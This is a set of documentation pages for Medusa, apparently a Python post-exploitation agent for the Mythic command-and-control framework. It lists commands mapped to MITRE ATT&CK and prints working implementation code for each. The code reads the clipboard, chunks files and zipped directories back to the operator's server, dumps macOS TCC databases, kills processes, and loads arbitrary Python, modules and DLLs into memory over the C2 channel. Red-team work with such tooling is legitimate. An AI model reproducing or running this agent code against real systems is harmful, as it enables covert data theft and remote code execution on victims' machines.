{{% notice warning %}} Root does _*NOT*_ have a clipboard {{% /notice %}} - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Reading Clipboard ``` clipboard ``` This will read the plaintext data on the clipboard only. Any non-text content will be omitted. ## MITRE ATT&CK Mapping - T1115 ## Detailed Summary This uses Objective C API calls to read all the types available on the general clipboard for the current user. The clipboard on macOS has a lot more data than _just_ what you copy. All of that data is collected and returned in a JSON blob of key:base64(data). To do this, we use this JavaScript code: ```JavaScript let pb = $.NSPasteboard.generalPasteboard; let types = pb.types.js; let clipboard = {}; for(let i = 0; i < types.length; i++){ let typejs = types[i].js; clipboard[typejs] = pb.dataForType(types[i]); if(clipboard[typejs].js !== undefined){ clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js; }else{ clipboard[typejs] = ""; } } ``` There's a browserscript for this function that'll return all of the keys and the plaintext data if it's there. ================================================ FILE: documentation-payload/medusa/commands/cp.md ================================================ +++ title = "cp" chapter = false weight = 100 hidden = false +++ ## Summary Copy a given file or folder to a specified location. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### source_path - Description: path of file/folder to copy - Required Value: True - Default Value: None #### dest_path - Description: path to copy file/folder to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` cp path/of/file_or_folder /dest/to/copy/to ``` ## Detailed Summary You can either type `cp` and get a popup to fill in the paths, or provide the paths on the command line. 
```Python def cp(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) if os.path.isdir(source_path): shutil.copytree(source_path, dest_path) else: shutil.copy(source_path, dest_path) ``` ================================================ FILE: documentation-payload/medusa/commands/cwd.md ================================================ +++ title = "cwd" chapter = false weight = 100 hidden = false +++ ## Summary Prints the current working directory for the agent - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` cwd ``` ## MITRE ATT&CK Mapping - T1083 ## Detailed Summary Prints the variable value used by Medusa to track current directory: ```Python def cwd(self, task_id): return self.current_directory ``` ================================================ FILE: documentation-payload/medusa/commands/download.md ================================================ +++ title = "download" chapter = false weight = 100 hidden = false +++ ## Summary Download a file from the target machine. 
- Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### remote_path - Description: /remote/path/on/victim.txt - Required Value: True - Default Value: None ## Usage ``` download /remote/path ``` ## MITRE ATT&CK Mapping - T1020 - T1030 - T1041 ## Detailed Summary This function uses API calls to chunk and transfer a file from the agent: ```Python def download(self, task_id, file): file_path = file if file[0] == os.sep \ else os.path.join(self.current_directory,file) file_size = os.stat(file_path).st_size total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [ { "task_id": task_id, "total_chunks": total_chunks, "full_path": file_path, "chunk_size": CHUNK_SIZE }] } initial_response = self.postMessageAndRetrieveResponse(data) chunk_num = 1 with open(file_path, 'rb') as f: while True: if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." content = f.read(CHUNK_SIZE) if not content: break # done data = { "action": "post_response", "responses": [ { "chunk_num": chunk_num, "file_id": initial_response["responses"][0]["file_id"], "chunk_data": base64.b64encode(content).decode(), "task_id": task_id } ] } chunk_num+=1 response = self.postMessageAndRetrieveResponse(data) ``` ================================================ FILE: documentation-payload/medusa/commands/download_bulk.md ================================================ +++ title = "download_bulk" chapter = false weight = 100 hidden = false +++ ## Summary Bulk download file(s), director(ies), or a mix from the target machine. Two modes are supported: - **archive** *(default)*: all files are bundled into a single in-memory zip archive that is streamed back to the Mythic server. The archive is never written to disk on the target. - **iterative**: each file is transferred individually using the same chunked approach as the `download` command. 
The command automatically detects whether each supplied path is a file or a directory. When a directory is specified, all files within it (recursively) are included. Files that do not exist or are not accessible are skipped rather than causing the entire task to fail. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @maclarel ### Arguments #### path - Description: An array of file or directory paths to download. Multiple entries can be added through the Mythic UI or provided as a JSON array. - Required Value: True - Default Value: None #### mode - Description: `archive` (default) to bundle everything into a single in-memory zip, or `iterative` to transfer each file individually. - Required Value: False - Default Value: `archive` ## Usage Download an entire directory as a zip archive (default mode): ``` download_bulk {"path": ["/remote/directory"], "mode": "archive"} ``` Download a single file using archive mode: ``` download_bulk {"path": ["/remote/path/to/file.txt"]} ``` Download multiple specific files iteratively: ``` download_bulk {"path": ["/remote/file1.txt", "/remote/file2.txt"], "mode": "iterative"} ``` Download a directory, sending each file individually: ``` download_bulk {"path": ["/remote/directory"], "mode": "iterative"} ``` ## MITRE ATT&CK Mapping - T1020 - T1030 - T1041 ## Detailed Summary The `download_bulk` function extends the single-file `download` capability to support bulk transfers. ### Path detection The `path` argument accepts an array of paths. Each entry is resolved using `os.path.isdir` and `os.path.isfile`. Relative paths are resolved against the agent's current working directory: - **Directory** – the directory tree is walked with `os.walk`; every file found is added to the transfer list. - **File** – added directly to the transfer list. - **Non-existent** – skipped with a warning message; the task continues with remaining files. 
### Archive mode An in-memory `zipfile.ZipFile` (backed by `io.BytesIO`) is created and populated with all target files. The zip data is then chunked and sent to the Mythic server using the same `download` API used by the single-file `download` command. Note: This can be extremely slow to transfer larger amounts of data due to chunking. Expect to take a walk or a nap if you're trying to pull thousands of files/hundreds of MB of data. Directory structure is preserved inside the zip using `os.path.relpath` to compute each entry's arcname: - **Directory input** (e.g. `/etc/nginx`): entries are anchored at the parent directory, so the top-level name is included — `nginx/nginx.conf`, `nginx/conf.d/default.conf`. - **Single file input**: only the filename is stored (`passwd`). - **Explicit list input**: entries are anchored at the filesystem root, preserving the full path — `etc/passwd`, `home/user/report.txt`. ### Iterative mode Each file is transferred individually in the same chunked manner as the existing `download` command. A separate `file_id` is obtained from Mythic for each file, and the agent streams each one to completion before moving on to the next. ```Python def download_bulk(self, task_id, path, mode="archive"): import zipfile, io # Build file list from path array (files, directories, or mix) ... if mode == "iterative": for file_path in file_list: # chunk and send each file (same as download()) ... else: # Build in-memory zip zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf: for file_path in file_list: zf.write(file_path, arcname) # chunk and send zip_buffer.getvalue() ... 
``` ================================================ FILE: documentation-payload/medusa/commands/env.md ================================================ +++ title = "env" chapter = false weight = 100 hidden = false +++ ## Summary Prints the environment variables for the current process - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` env ``` ## Detailed Summary Lists the contents of the `os.environ` list: ```Python def env(self, task_id): return "\n".join(["{}: {}".format(x, os.environ[x]) for x in os.environ]) ``` ================================================ FILE: documentation-payload/medusa/commands/eval_code.md ================================================ +++ title = "eval_code" chapter = false weight = 100 hidden = false +++ ## Summary Send and interpret new Python code. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### code - Description: code to execute - Required Value: True - Default Value: None ## Usage ``` eval_code {code to execute} ``` ## Detailed Summary Uses the `eval()` function to interpret a string containing arbitrary Python code: ```Python def eval_code(self, task_id, command): return eval(command) ``` ================================================ FILE: documentation-payload/medusa/commands/exit.md ================================================ +++ title = "exit" chapter = false weight = 100 hidden = false +++ ## Summary This exits the current Medusa agent. 
- Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` exit ``` ## Detailed Summary The command executes this call: ```Python def exit(self, task_id): os._exit(0) ``` ================================================ FILE: documentation-payload/medusa/commands/jobs.md ================================================ +++ title = "jobs" chapter = false weight = 100 hidden = false +++ ## Summary Lists the currently running jobs (aka long-running functions) for our agent. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` jobs ``` ## Detailed Summary Lists the long-running functions running for our agent; this omits the main thread, the jobs function itself and any threads associated with the SOCKS proxy (outside of the main SOCKS thread, which we do include): ```Python def jobs(self, task_id): out = [t.name.split(":") for t in threading.enumerate() \ if t.name != "MainThread" and "a2m" not in t.name \ and "m2a" not in t.name and t.name != "jobs:{}".format(task_id) ] if len(out) > 0: return { "jobs": out } else: return "No long running jobs!" ``` ================================================ FILE: documentation-payload/medusa/commands/kill.md ================================================ +++ title = "kill" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with the Windows API to terminate a process with a specified PID. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` kill process_id ``` ## Detailed Summary This function takes a given PID and attempts to open a process handle and terminate it. 
```Python def kill(self, task_id, process_id): import ctypes, ctypes.wintypes from ctypes import GetLastError NTSTATUS = ctypes.wintypes.LONG def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool TerminateProcess = Kernel32.TerminateProcess TerminateProcess.restype = ctypes.wintypes.BOOL PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 try: hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id) if hProcess: TerminateProcess(hProcess, 1) CloseHandle(hProcess) except Exception as e: return e ``` ================================================ FILE: documentation-payload/medusa/commands/list_apps.md ================================================ +++ title = "list_apps" chapter = false weight = 100 hidden = false +++ ## Summary This uses NSApplication.RunningApplications API to get information about running applications. - Python Versions Supported: 2.7 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_apps ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This is different than executing `ps` in a terminal since this only reports back running applications, not _all_ processes running on a system. ```Python def list_apps(self, task_id): from Cocoa import NSWorkspace app_json = [] apps = NSWorkspace.sharedWorkspace().runningApplications() for app in apps: try: app_data = { "pid": str(app.processIdentifier()), "name": str(app.localizedName()), "exec_url": str(app.executableURL()) } app_json.append(app_data) except: pass return { "apps": app_json } ``` This output is turned into a sortable table via a browserscript. 
================================================ FILE: documentation-payload/medusa/commands/list_dlls.md ================================================ +++ title = "list_dlls" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to read the local or a remote process's PEB and list the loaded DLLs. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_dlls [process_id] ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This function takes an optional PID. If none is given, it will list DLLs loaded in the current process. ```Python def list_dlls(self, task_id, process_id=0): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError import re import datetime def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) # WINAPI Definitions PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ERROR_INVALID_HANDLE = 0x0006 ERROR_PARTIAL_COPY = 0x012B WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort 
= 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): # TODO: slicing size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class LDR_DATA_TABLE_ENTRY(ctypes.Structure): _fields_ = (('Reserved1', PVOID * 2), ('InMemoryOrderLinks', LIST_ENTRY), ('Reserved2', PVOID * 2), ('DllBase', PVOID), ('EntryPoint', PVOID), ('Reserved3', PVOID), ('FullDllName', UNICODE_STRING), ('Reserved4', ctypes.wintypes.BYTE * 8), 
('Reserved5', PVOID * 3), ('CheckSum', PVOID), ('TimeDateStamp', ctypes.wintypes.ULONG)) RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, 
PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle self._query_info() if process_id is not None and not self._ldr: return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: raise NtError(status) self._peb = peb = info.PebBaseAddress[0, handle] self._ldr = peb.Ldr[0, handle] def _modules_iter(self): headaddr = (PVOID.from_buffer(self._peb.Ldr).value + PEB_LDR_DATA.InMemoryOrderModuleList.offset) offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset pentry = self._ldr.InMemoryOrderModuleList.Flink while pentry: pentry_void = PVOID.from_buffer_copy(pentry) if pentry_void.value == headaddr: break pentry_void.value -= offset pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void) mod = pmod[0, self._handle] yield mod pentry = LIST_ENTRY.from_buffer(mod, offset).Flink def update_module_names(self): names = [] for m in self._modules_iter(): ustr = m.FullDllName name = ustr.Buffer[0, self._handle, ustr.Length] names.append(name) self._module_names = names @property def module_names(self): if self._module_names is None: self.update_module_names() return self._module_names try: if not process_id: pi = ProcessInformation() else: pi = ProcessInformation(process_id) return { "dlls": pi.module_names } except Exception as e: return e ``` This output is turned into a sortable table via a 
browserscript. ================================================ FILE: documentation-payload/medusa/commands/list_modules.md ================================================ +++ title = "list_modules" chapter = false weight = 100 hidden = false +++ ## Summary Lists the modules (Python libraries) that have been loaded into the Medusa agent. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### module_name - Description: specific module to output a full file listing for - Required Value: False - Default Value: "" ## Usage ``` list_modules [module_name] ``` ## Detailed Summary This function will list the names of the modules that have been loaded into memory, and can provide a detailed file listing if a module name is passed to it: ```Python def list_modules(self, task_id, module_name=""): if module_name: if module_name in self.moduleRepo.keys(): return "\n".join(self.moduleRepo[module_name].namelist()) else: return "{} not found in loaded modules".format(module_name) else: return "\n".join(self.moduleRepo.keys()) ``` ================================================ FILE: documentation-payload/medusa/commands/list_tcc.md ================================================ +++ title = "list_tcc" chapter = false weight = 100 hidden = false +++ ## Summary This uses the Python `sqlite3` library to query TCC databases and return the contents. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_tcc ``` ## Detailed Summary With the relevant access, Medusa uses the `sqlite3` library to query the contents of either the Root or user-specific TCC databases. This is then formatted by a browser script in the UI. 
```Python def list_tcc(self,task_id,tcc=True, db="/Library/Application Support/com.apple.TCC/TCC.db"): import sqlite3 with sqlite3.connect(db) as con: columns = [] for row in con.execute('PRAGMA table_info("access")'): columns.append(row) tcc = [] for row in con.execute('SELECT * FROM "access"'): tcc.append(row) results = [] for entry in tcc: line={} count = 0 for ent in entry: if columns[count][2] == "BLOB" and ent != None: line[columns[count][1]] = base64.b64encode(ent).decode() else: line[columns[count][1]] = str(ent) count+=1 results.append(line) tcc_results = {} tcc_results["entries"] = results return { "tcc": results } ``` ================================================ FILE: documentation-payload/medusa/commands/load.md ================================================ +++ title = "load" chapter = false weight = 100 hidden = false +++ ## Summary This loads new functions into memory via the C2 channel - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### cmd_to_load - Description: name of existing Medusa command to load (e.g. shell) - Required Value: True - Default Value: None ## Usage ``` load cmd ``` ## MITRE ATT&CK Mapping - T1030 - T1129 ## Detailed Summary The associated command's python files (selecting the correct Python version where necessary) is base64 encoded, and sent down to the agent to be loaded in. ```Python def load(self, task_id, file_id, command): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." 
data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file_id, "chunk_num": chunk_num }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code.replace("\n ","\n")[4:]) setattr(medusa, command, eval(command)) cmd_list = [{"action": "add", "cmd": command}] responses = [{ "task_id": task_id, "user_output": "Loaded command: {}".format(command), "commands": cmd_list, "completed": True }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) else: return "Failed to upload '{}' command".format(command) ``` Notably, this implementation implements chunking for this function to facilitate large functions being loaded. ================================================ FILE: documentation-payload/medusa/commands/load_dll.md ================================================ +++ title = "load_dll" chapter = false weight = 100 hidden = false +++ ## Summary Uses Python's `ctypes` library to load a DLL on disk and execute it with a given export function. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: path to DLL on target file system - Required Value: True - Default Value: None #### export - Description: exported function to execute - Required Value: True - Default Value: None ## Usage ``` load_dll path/to/dll function_exported ``` ## Detailed Summary Uses the `ctypes` library to execute a DLL with its supported function. 
This expects a DLL that returns an int value and doesn't exit the process upon completion (because that'll kill the agent too!): ```Python def load_dll(self, task_id, dllpath, dllexport): from ctypes import WinDLL dll_file_path = dllpath if dllpath[0] == os.sep \ else os.path.join(self.current_directory,dllpath) loaded_dll = WinDLL(dll_file_path) eval("{}.{}()".format("loaded_dll",dllexport)) return "[*] {} Loaded.".format(dllpath) ``` ================================================ FILE: documentation-payload/medusa/commands/load_module.md ================================================ +++ title = "load_module" chapter = false weight = 100 hidden = false +++ ## Summary Loads a zipped Python module into memory for reference in custom scripts. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### file - Description: a local zip file containing the directory for a python module - Required Value: True - Default Value: None #### module_name - Description: the name of the module being loaded, e.g. 'dns' - Required Value: True - Default Value: None ## Usage ``` load_module ``` ## Detailed Summary This function instantiates a new custom finder and adds it to `meta_path`. 
When an import is used in subsequent scripts, the `meta_path` will use this custom finder to load the module directly from memory, rather than from on-disk standard locations: Python 2.7 ```Python def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) _search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import imp submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, imp.new_module(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec code in 
mod.__dict__ return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ``` Python 3.8: ```Python def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) 
_search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import types submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, types.ModuleType(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec(code, mod.__dict__) return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) 
return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ``` ================================================ FILE: documentation-payload/medusa/commands/load_script.md ================================================ +++ title = "load_script" chapter = false weight = 100 hidden = false +++ ## Summary This loads a new script into memory via the C2 channel. It can be used in combination with the `eval_code` function, and `setattr()` to dynamically add capability outside of Medusa's existing functions. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### file - Description: script file to load into agent - Required Value: True - Default Value: None ## Usage ``` load_script ``` ## Detailed Summary The python script is downloaded and executed using the Python `exec()` function. Notably, this implementation implements chunking for this function to facilitate large scripts being loaded. 
